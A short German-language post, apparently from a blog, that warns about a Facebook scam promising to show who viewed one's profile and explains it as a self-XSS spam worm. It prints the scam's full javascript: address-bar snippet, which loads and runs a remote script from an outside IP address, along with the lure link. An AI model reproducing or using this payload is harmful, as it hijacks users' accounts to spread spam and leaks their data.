VORNAME wow facebook kann dir jetzt anzeigen wer dein Profil ansieht! Schaus dir an @http://ow.ly/4DDVJNatürlich kommt man dann auf ihrgend eine komische Seite bei der man wieder irgendwas angeben muss! Achtung ihr macht das alle mit eurem Facebook-Login. Und der Seitenbetreiber bekommt jede Menge Daten über euch die ihr ihm sicherlich nicht mitteilen wollt!
Interessant ist auch wenn man sich die Seite hinter dem Link einmal nüchtern ansieht. Hier wird man aufgeforder sich bei Facebook anzumelden und dann ein Script in den Adressbereich des Browsers einzugeben...
Ja, schon ab hier kann man von XSS(Cross site scripting) sprechen. Es wird gezielt versucht Facebook zwischen verschieden Seitenaufrufen zu manipulieren. Hinter dem Code steckt nach meinen ersten Erkenntnissen nicht mehr, als dass bei einem Aufruf über die Chatfunktion von Facebook per zufall(Math.random()) immer mehr Leute(Freunde) dieser Link geschickt wird!!
Ein massives Spamscript also!
javascript:(function(){_ccscr=document.createElement('SCRIPT');_ccscr.type='text/javascript';_ccscr.src='http://216.24.202.125/invite.php?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();
Was genau passiert kann man hier unter http://216.24.202.125/invite.php sehen.
- Auf T-Online "Facebook-Spam überrollt soziales Netzwerk
